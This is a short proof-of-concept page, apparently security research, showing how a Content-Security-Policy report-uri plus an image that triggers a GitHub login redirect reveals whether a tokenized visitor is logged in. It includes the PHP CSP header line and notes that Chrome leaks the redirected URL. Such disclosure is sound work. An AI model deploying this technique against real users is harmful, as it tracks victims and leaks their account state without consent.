Now, you are on a tokenized page (so victim is identifiable by the attacker).
This page holds the following Content-Security-Policy header:
header("Content-Security-Policy:" .
"default-src 'self' https://github.com;" .
"report-uri /mdn/csp/exfiltrate-data-poc/csp-receiver.php");
This means that the browser will allow the current page to load any resource from
https://github.com or from the attacker's origin ('self'),
but browser will refuse to load anything else (like https://help.github.com).
So, attacker puts an image below with the URL
https://github.com/login?return_to=%2Fhelp.
If user is logged into GitHub, then this page will issue a redirection to
another origin (https://help.github.com), which is not
allowed by the attacker's CSP. So the browser will refuse to request this redirection,
and it will send a report to the URL specified by report-uri directive.
The body of the requets to this URL will contain the attacker's page URL (document-uri)
with the victim's unique token so when the attacker receive such report, it means
this user is logged into GitHub.
If user is not logged into GitHub, then the https://github.com
page will be loaded and browser will try to show it in image tag (and fail to, but we don't case).
Since no CSP violation occured, browser will not send any report, so attacker will know user
is not logged into GitHub.
GitHub image is loaded below. Check you browser console to see CSP violation report requests.
For this POC, the attacker's received reports is accessible from here).
Another interesting thing is that browsers send different uris in the report:
Firefox sends the original image's uri "blocked-uri":
"https:\/\/github.com\/login?return_to=%2Fhelp",
meaning you're not able to leak a lot of data from the GitHub's rediction itself
But Chroms sends the redirected uri "blocked-uri": "https:\/\/help.github.com",
meaning that if your targeted website (here, GitHub) shows important information in the redirection URL
(say, user's account name or email), then you could access this information too.